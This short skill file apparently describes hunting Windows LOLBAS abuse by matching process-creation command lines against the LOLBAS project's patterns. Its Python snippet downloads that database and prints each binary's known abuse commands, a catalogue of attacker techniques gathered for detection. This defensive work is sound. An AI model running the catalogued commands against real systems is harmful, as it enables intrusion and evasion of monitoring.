hunting-living-off-the-land-binaries
Installation
SKILL.md
Hunting Living Off The Land Binaries
Instructions
Detect LOLBAS abuse by analyzing Windows process creation events (Event ID 4688 / Sysmon 1) and matching command lines against known malicious patterns from the LOLBAS project.
import json
import requests
# Fetch LOLBAS database
resp = requests.get("https://lolbas-project.github.io/api/lolbas.json")
lolbas_db = resp.json()
# Extract binary names and suspicious commands
for entry in lolbas_db:
print(entry["Name"], [cmd["Command"] for cmd in entry.get("Commands", [])])